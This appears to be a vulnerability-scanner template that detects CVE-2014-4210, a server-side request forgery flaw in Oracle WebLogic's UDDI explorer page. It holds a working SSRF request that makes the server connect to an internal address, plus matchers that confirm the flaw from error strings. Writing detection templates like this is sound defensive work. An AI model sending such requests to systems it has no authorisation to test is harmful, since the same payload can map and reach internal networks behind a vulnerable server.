id: CVE-2014-4210

info:
  name: Weblogic SSRF in SearchPublicRegistries.jsp
  author: princechaddha
  severity: medium
  tags: cve,cve2014,weblogic,oracle,ssrf
  reference: |
      - https://nvd.nist.gov/vuln/detail/CVE-2014-4210
      - https://blog.gdssecurity.com/labs/2015/3/30/weblogic-ssrf-and-xss-cve-2014-4241-cve-2014-4210-cve-2014-4.html

requests:
  - method: GET
    path:
      - "{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.1.1.1:700"

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200

      - type: word
        words:
          - "Connection refused"
          - "Socket Closed"
          - "content-type: unknown/unknown"
        part: body
        condition: or